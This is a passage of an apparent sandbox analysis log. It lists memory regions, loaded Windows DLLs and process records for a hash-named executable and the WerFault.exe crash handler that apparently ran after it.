name = "pagefile_0x0000000000620000" filename = "" Region: id = 1571 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1572 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1573 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1574 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1575 start_va = 0x620000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 1576 start_va = 0x670000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 1577 start_va = 0x5ed0000 end_va = 0x5f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ed0000" filename = "" Region: id = 1578 start_va = 0x620000 end_va = 0x621fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "faultrep.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\faultrep.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\faultrep.dll.mui") Region: id = 1579 start_va = 0x630000 end_va = 0x630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1580 start_va = 0x6c510000 end_va = 0x6c92dfff monitored = 0 entry_point = 0x6c60ee80 region_type = mapped_file name = "dbgeng.dll" filename = "\\Windows\\SysWOW64\\dbgeng.dll" (normalized: "c:\\windows\\syswow64\\dbgeng.dll") Region: id = 1581 start_va = 0x76150000 end_va = 0x761e1fff monitored = 0 entry_point = 0x76188cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1582 start_va = 0x6b120000 end_va = 0x6b18ffff monitored = 0 entry_point = 0x6b174b90 region_type = mapped_file name = "dbgmodel.dll" filename = "\\Windows\\SysWOW64\\DbgModel.dll" (normalized: "c:\\windows\\syswow64\\dbgmodel.dll") Region: id = 1583 start_va = 0x70040000 end_va = 0x7006cfff monitored = 0 entry_point = 0x70052b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 1584 start_va = 0x5f50000 end_va = 0x6039fff monitored = 0 entry_point = 0x5f8d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1585 start_va = 0x6cc40000 end_va = 0x6cc49fff monitored = 0 entry_point = 0x6cc43200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 1586 start_va = 0x75790000 end_va = 0x757d4fff monitored = 0 entry_point = 0x757ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1587 start_va = 0x70030000 end_va = 0x70037fff monitored = 0 entry_point = 0x700317b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1588 start_va = 0x5f50000 end_va = 0x604ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f50000" filename = "" Region: id = 1589 start_va = 0x75160000 end_va = 0x7524afff monitored = 0 entry_point = 0x7519d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1590 start_va = 0x6050000 end_va = 0x6386fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1591 start_va = 0x630000 end_va = 0x631fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1592 start_va = 0x630000 end_va = 0x633fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1593 start_va = 0x630000 end_va = 0x635fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1594 start_va = 0x630000 end_va = 0x637fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1595 start_va = 0x6390000 end_va = 0x648ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006390000" filename = "" Region: id = 1596 start_va = 0x630000 end_va = 0x639fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1597 start_va = 0x630000 end_va = 0x63bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1598 start_va = 0x630000 end_va = 0x63dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1599 start_va = 0x630000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1600 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1601 start_va = 0x630000 end_va = 0x643fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1602 start_va = 0x630000 end_va = 0x645fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1603 start_va = 0x630000 end_va = 0x647fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1604 start_va = 0x630000 end_va = 0x649fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1605 start_va = 0x630000 end_va = 0x64bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1606 start_va = 0x630000 end_va = 0x64dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1607 start_va = 0x630000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1608 start_va = 0x6490000 end_va = 0x658ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006490000" filename = "" Region: id = 1609 start_va = 0x6590000 end_va = 0x666ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1610 start_va = 0x6670000 end_va = 0x6733fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 1611 start_va = 0x630000 end_va = 0x630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1612 start_va = 0x640000 end_va = 0x642fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wer.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wer.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wer.dll.mui") Region: id = 1613 start_va = 0x650000 end_va = 0x653fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 1614 start_va = 0x6670000 end_va = 0x6e6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006670000" filename = "" Region: id = 1615 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1616 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1617 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1618 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1619 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1620 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1621 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1622 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1623 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1624 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1625 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1626 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1627 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1628 start_va = 0x6670000 end_va = 0x676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 1629 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1630 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1631 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1632 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1633 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1634 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1635 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1636 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1637 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1638 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1639 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1640 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1641 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1642 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1643 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1644 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1645 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1646 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1647 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1648 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1649 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1650 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1651 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1652 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1653 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1654 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1655 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1656 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1657 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1658 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1659 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1660 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1661 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1662 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1663 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1664 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1665 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1666 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1667 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1668 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1669 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1670 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1671 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1672 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1673 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1674 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1675 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1676 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1677 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1678 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Thread: id = 33 os_tid = 0xd0c Thread: id = 34 os_tid = 0x748 Thread: id = 35 os_tid = 0xbe4 Process: id = "12" image_name = "f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" page_root = "0x3837b000" os_pid = "0xfc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x5bc" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe\" " cur_dir = "C:\\Windows\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Process: id = "13" image_name = "werfault.exe" filename = "c:\\windows\\syswow64\\werfault.exe" page_root = "0x513dd000" os_pid = "0x80c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x5bc" cmd_line = "C:\\Windows\\SysWOW64\\WerFault.exe -u -p 1468 -s 1392" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2089 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2090 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2091 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2092 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2093 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2094 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2095 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 2096 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 2097 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2098 start_va = 0x8f0000 end_va = 0x932fff monitored = 0 entry_point = 0x910f50 region_type = mapped_file name = "werfault.exe" filename = "\\Windows\\SysWOW64\\WerFault.exe" (normalized: "c:\\windows\\syswow64\\werfault.exe") Region: id = 2099 start_va = 0x940000 end_va = 0x493ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 2100 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2101 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2102 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2103 start_va = 0x7fff0000 end_va = 0x7dfb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2104 start_va = 0x7dfb28b00000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfb28b00000" filename = "" Region: id = 2105 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2106 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 2107 start_va = 0x110000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 2108 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2109 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2110 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2111 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2112 start_va = 0x400000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2113 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2114 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2115 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2116 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2117 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2118 start_va = 0x4f0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 2119 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2120 start_va = 0x110000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 2121 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2122 start_va = 0x160000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2123 start_va = 0x748e0000 end_va = 0x7496cfff monitored = 0 entry_point = 0x74929b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 2124 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2125 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2126 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2127 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2128 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2129 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2130 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2131 start_va = 0x77820000 end_va = 0x7789afff monitored = 0 entry_point = 0x7783e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2132 start_va = 0x6cad0000 end_va = 0x6cb56fff monitored = 0 entry_point = 0x6cb3dbc0 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\SysWOW64\\wer.dll" (normalized: "c:\\windows\\syswow64\\wer.dll") Region: id = 2133 start_va = 0x6c990000 end_va = 0x6cacefff monitored = 0 entry_point = 0x6c9bd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 2134 start_va = 0x72700000 end_va = 0x72721fff monitored = 0 entry_point = 0x727091f0 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 2135 start_va = 0x75300000 end_va = 0x75336fff monitored = 0 entry_point = 0x75303b50 region_type = mapped_file name = "cfgmgr32.dll" filename = 